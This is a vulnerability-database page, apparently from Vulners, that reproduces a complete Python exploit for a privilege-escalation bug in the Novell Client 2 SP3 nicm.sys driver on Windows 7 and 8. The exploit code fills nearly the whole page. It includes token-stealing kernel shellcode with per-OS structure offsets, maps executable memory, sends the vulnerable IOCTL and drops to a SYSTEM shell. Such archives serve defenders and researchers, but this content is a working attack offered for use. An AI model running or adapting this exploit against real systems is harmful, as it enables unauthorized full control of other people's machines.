Vulners
Lucene search
Novell Client 2 SP3 - Privilege Escalation Exploit
# Novell Client 2 SP3 Privilege escalation exploit
# Tested on Windows 7 and 8 (x86) / nicm.sys 3.1.11.0
# Thanks to Master Ryujin :)
# The first public information I have seen about this bug was from Nikita Tarakanov @NTarakanov (I am not sure weather there was anything else public)
# Exploit for DEMO purposes :)
# Does not bypass SMEP on Windows 8
# Metasploit module working against Windows 7: http://www.exploit-db.com/exploits/26452/
from ctypes import *
import sys,struct,os
from optparse import OptionParser
kernel32 = windll.kernel32
ntdll = windll.ntdll
if __name__ == '__main__':
usage = "%prog -o <target>"
parser = OptionParser(usage=usage)
parser.add_option("-o", type="string",
action="store", dest="target_os",
help="Available target operating systems: WIN7, WIN8")
(options, args) = parser.parse_args()
OS = options.target_os
if not OS or OS.upper() not in ['WIN7','WIN8']:
parser.print_help()
sys.exit()
OS = OS.upper()
if OS == "WIN7":
_KPROCESS = "\x50" # Offset for Win7
_TOKEN = "\xf8" # Offset for Win7
_UPID = "\xb4" # Offset for Win7
_APLINKS = "\xb8" # Offset for Win7
steal_token = "\x52" +\
"\x53" +\
"\x33\xc0" +\
"\x64\x8b\x80\x24\x01\x00\x00" +\
"\x8b\x40" + _KPROCESS +\
"\x8b\xc8" +\
"\x8b\x98" + _TOKEN + "\x00\x00\x00" +\
"\x89\x1d\x00\x09\x02\x00" +\
"\x8b\x80" + _APLINKS + "\x00\x00\x00" +\
"\x81\xe8" + _APLINKS + "\x00\x00\x00" +\
"\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\
"\x75\xe8" +\
"\x8b\x90" + _TOKEN + "\x00\x00\x00" +\
"\x8b\xc1" +\
"\x89\x90" + _TOKEN + "\x00\x00\x00" +\
"\x5b" +\
"\x5a" +\
"\xc2\x08"
sc = steal_token
else:
_KPROCESS = "\x80" # Offset for Win8
_TOKEN = "\xEC" # Offset for Win8
_UPID = "\xB4" # Offset for Win8
_APLINKS = "\xB8" # Offset for Win8
steal_token = "\x52" +\
"\x53" +\
"\x33\xc0" +\
"\x64\x8b\x80\x24\x01\x00\x00" +\
"\x8b\x80" + _KPROCESS + "\x00\x00\x00"+\
"\x8b\xc8" +\
"\x8b\x98" + _TOKEN + "\x00\x00\x00" +\
"\x8b\x80" + _APLINKS + "\x00\x00\x00" +\
"\x81\xe8" + _APLINKS + "\x00\x00\x00" +\
"\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\
"\x75\xe8" +\
"\x8b\x90" + _TOKEN + "\x00\x00\x00" +\
"\x8b\xc1" +\
"\x89\x90" + _TOKEN + "\x00\x00\x00" +\
"\x5b" +\
"\x5a" +\
"\xc2\x08"
sc = steal_token
kernel_sc = "\x14\x00\x0d\x0d"
kernel_sc+= "\x41\x41\x41\x41"
kernel_sc+= "\x41\x41\x41\x41"
kernel_sc+= "\x41\x41\x41\x41"
kernel_sc+= "\x41\x41\x41\x41"
kernel_sc+= "\x18\x00\x0d\x0d"
kernel_sc+= "\x41\x41\x41\x41"
kernel_sc+= "\x41\x41\x41\x41"
kernel_sc+= "\x41\x41\x41\x41"
kernel_sc+= "\x28\x00\x0d\x0d"
kernel_sc+= sc
print "[>] Novell Client 2 SP3 privilege escalation for Windows 7 and Windows 8."
print "[>] Finding the driver."
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
DEVICE = '\\\\.\\nicm'
device_handler = kernel32.CreateFileA(DEVICE, GENERIC_READ|GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
EVIL_IOCTL = 0x00143B6B # Vulnerable IOCTL
retn = c_ulong()
inut_buffer = 0x0d0d0000
inut_size = 0x14
output_buffer = 0x0
output_size = 0x0
baseadd = c_int(0x0d0d0000)
MEMRES = (0x1000 | 0x2000)
PAGEEXE = 0x00000040
Zero_Bits = c_int(0)
RegionSize = c_int(0x1000)
write = c_int(0)
print "[>] Allocating memory for our shellcode."
dwStatus = ntdll.NtAllocateVirtualMemory(-1, byref(baseadd), 0x0, byref(RegionSize), MEMRES, PAGEEXE)
print "[>] Writing the shellcode."
kernel32.WriteProcessMemory(-1, 0x0d0d0000, kernel_sc, 0x1000, byref(write))
if device_handler:
print "[>] Sending IOCTL to the driver."
dev_io = kernel32.DeviceIoControl(device_handler, EVIL_IOCTL, inut_buffer, inut_size, output_buffer, output_size, byref(retn), None)
print "[>] Dropping to a SYSTEM shell."
os.system("cmd.exe /K cd C:\\windows\\system32")
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1